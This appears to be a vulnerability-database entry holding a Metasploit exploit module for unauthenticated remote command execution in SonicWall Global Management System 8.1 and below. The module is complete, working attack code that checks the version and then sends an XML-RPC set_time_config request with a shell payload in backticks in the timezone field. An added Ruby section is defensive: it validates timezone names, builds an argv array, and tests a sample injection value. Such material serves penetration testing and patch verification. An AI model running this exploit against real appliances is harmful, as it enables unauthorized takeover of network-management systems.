SonicWall Global Management System XMLRPC set_time_zone Unauth RCE
1976-01-01T00:00:00
ID: MSF:EXPLOIT/UNIX/SONICWALL/SONICWALL_XMLRPC_RCE
Type: metasploit
Reporter: Rapid7
Modified: 1976-01-01T00:00:00
Description
This module exploits a vulnerability in SonicWall Global Management System Virtual Appliance versions 8.1 (Build 8110.1197) and below. This virtual appliance can be downloaded from http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a holistic way to manage your entire network security environment.' These vulnerable versions (8.1 Build 8110.1197 and below) do not prevent unauthenticated, external entities from making XML-RPC requests to port 21009 of the virtual app. After the XML-RPC call is made, a shell script is called like so: 'timeSetup.sh --tz="`command injection here`" --usentp="blah"'. The timezone value reaches the shell command line unsanitized, so backticks inside it are evaluated as command substitution.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name' => "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE",
      'Description' => %q{
        This module exploits a vulnerability in SonicWall Global
        Management System Virtual Appliance versions 8.1 (Build 8110.1197)
        and below. This virtual appliance can be downloaded from
        http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a
        holistic way to manage your entire network security environment.'

        These vulnerable versions (8.1 Build 8110.1197 and below) do not
        prevent unauthenticated, external entities from making XML-RPC
        requests to port 21009 of the virtual app. After the XML-RPC call
        is made, a shell script is called like so:
        'timeSetup.sh --tz="`command injection here`"' --usentp="blah"'.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'Michael Flanders', #MSF Module
                    'kernelsmith' #Advisor
                  ],
      'References' => [
        ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],
        ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']
      ],
      'Platform' => [ 'unix' ],
      'Arch' => ARCH_CMD,
      'Targets' => [
        [ 'SonicWall Global Management System Virtual Appliance', {} ],
      ],
      'Payload' => {
        # Can't use ampersand, Java's XML-RPC parser will complain and return an error
        'BadChars' => "\x26",
        'Compat' => {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic bash telnet'
        }
      },
      'DisclosureDate' => '2016-07-22',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.
          Defaults to 80/443 depending on SSL.'])
      ])
  end

  def check
    if datastore['WEB_SERVER_PORT']
      port_number = datastore['WEB_SERVER_PORT']
    else
      port_number = datastore['SSL'] ? '443' : '80'
    end

    handler = datastore['SSL'] ? 'https' : 'http'

    res = request_url("#{handler}://#{rhost}:#{port_number}")

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200 && res.body =~ /<TITLE>.+v(\d\.\d)/
      return CheckCode::Safe
    end

    version = Gem::Version.new $1.to_s

    unless version <= Gem::Version.new('8.1')
      return CheckCode::Safe
    end

    CheckCode::Appears
  end

  def exploit
    unless check == CheckCode::Appears
      fail_with Failure::NotVulnerable, "The target is not vulnerable."
    end

    print_status "The target appears to be vulnerable, continuing exploit..."
    send_xml
  end

  def send_xml
    xml_body = <<~HERESTRING
      <?xml version="1.0" encoding="UTF-8"?>
      <methodCall>
        <methodName>set_time_config</methodName>
        <params>
          <param>
            <value>
              <struct>
                <member>
                  <name>timezone</name>
                  <value>
                    <string>"`#{payload.encoded}`"</string>
                  </value>
                </member>
              </struct>
            </value>
          </param>
        </params>
      </methodCall>
    HERESTRING

    res = send_request_raw({
      'method' => 'POST',
      'uri' => '/',
      'data' => xml_body,
      'ctype' => 'text/xml; charset=UTF-8'
    })

    unless res && res.body.include?("success")
      print_error("Error sending XML to #{rhost}:#{rport}")
    end
  end

end
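
The server-side check whose absence makes this injection possible, as an added defensive example (not part of the Metasploit module and not SonicWall's code): it extracts the `timezone` member from a `set_time_config` XML-RPC body, accepts only IANA-style zone names, and builds an argv array so no shell parses the value. `TZ_NAME`, `xmlrpc_member`, `timezone_verdict`, `time_setup_argv`, `sample_call` and the script path are hypothetical, and the request bodies are constructed samples.

```ruby
require 'rexml/document'

# Assumption: legitimate values are IANA tz database names such as
# "UTC", "America/Chicago" or "America/Argentina/Buenos_Aires".
# \A and \z anchor the whole string, so a trailing newline cannot slip past.
TZ_NAME = %r{\A[A-Za-z][A-Za-z0-9_+\-]*(/[A-Za-z0-9_+\-]+){0,2}\z}

# Return the string value of one struct member of an XML-RPC methodCall,
# or nil when the body is not a call to +method+ or cannot be parsed.
def xmlrpc_member(body, method, member)
  doc = REXML::Document.new(body)
  return nil unless doc.elements['methodCall/methodName']&.text == method

  doc.elements.each('methodCall/params/param/value/struct/member') do |m|
    next unless m.elements['name']&.text == member
    value = m.elements['value']
    next unless value
    # XML-RPC treats an untyped <value> as a string.
    return (value.elements['string'] || value).text.to_s
  end
  nil
rescue REXML::ParseException
  nil
end

# :ok, :reject, or :not_applicable for a raw request body. Usable both as an
# input gate in the handler and as a detection rule over captured requests.
def timezone_verdict(body)
  tz = xmlrpc_member(body, 'set_time_config', 'timezone')
  return :not_applicable if tz.nil?

  TZ_NAME.match?(tz) ? :ok : :reject
end

# Build the command as an argv array. Passed to system(*argv), each element
# reaches the script as one argument and no shell interprets backticks or
# quotes. The script path is a placeholder.
def time_setup_argv(tz, script: '/path/to/timeSetup.sh')
  raise ArgumentError, 'invalid timezone' unless TZ_NAME.match?(tz)

  [script, "--tz=#{tz}"]
end

# Constructed sample request with the shape the module sends.
def sample_call(tz)
  <<~XML
    <?xml version="1.0" encoding="UTF-8"?>
    <methodCall>
      <methodName>set_time_config</methodName>
      <params><param><value><struct>
        <member><name>timezone</name><value><string>#{tz}</string></value></member>
      </struct></value></param></params>
    </methodCall>
  XML
end

if __FILE__ == $PROGRAM_NAME
  ['America/Chicago', '"`id`"'].each do |tz|
    puts "#{tz.inspect}: #{timezone_verdict(sample_call(tz))}"
  end
end
```

Validation still matters with the argv form, because the script receiving `--tz` may itself expand the value. Restricting port 21009 to management hosts addresses the unauthenticated access the description points out.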